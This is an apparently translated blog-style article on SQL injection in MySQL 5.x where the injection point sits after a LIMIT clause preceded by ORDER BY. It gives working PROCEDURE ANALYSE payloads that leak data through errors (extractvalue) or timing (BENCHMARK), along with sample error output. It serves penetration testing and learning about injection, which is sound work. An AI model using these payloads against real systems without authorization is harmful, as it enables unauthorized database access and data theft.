Usage of Mysql injection points after the limit keyword
There are countless articles describing SQL injection methods. This article describes a special scenario.
Details
In a test, I encountered an SQL injection problem. I did not find a solution on the Internet. At that time, the injection point was after the limit keyword, and the database was MySQL5.x, the SQL statement is similar to the following:
SELECT field FROM table WHERE id> 0 order by id LIMIT [injection point]
The key to the problem is that the statement contains the order by keyword. We know that the union keyword can be used before the order by keyword in mysql. Therefore, if the order by keyword is not found before the injection point, the union keyword can be used smoothly, but now there is an order by keyword before the injection point. This problem lies in stackoverflow and sla. ckers has been discussed, but there is no effective solution.
Let's take a look at the select syntax in mysql 5.x:
SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]]
The limit keyword is followed by the PROCEDURE and INTO keywords. The into keyword can be used to write files, but this is not important in this article. The focus here is the PROCEDURE keyword. by default, only ANALYSE (doc) is available for MySQL ).
Try this stored procedure:
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure
ANALYSE supports two parameters. Try two parameters:
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure
Still invalid. Try to insert the SQL statement in ANALYSE:
mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);
The response is as follows:
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’
It turns out that sleep has not been executed. In the end, I tried the following payload:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
Aha, the above method is common error injection. Therefore, if the injection point supports error reporting, all problems are OK, but if the injection point does not report an error, you can also use time-based injection. The payload is as follows:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
Interestingly, sleep is not used, but BENCHMARK is used.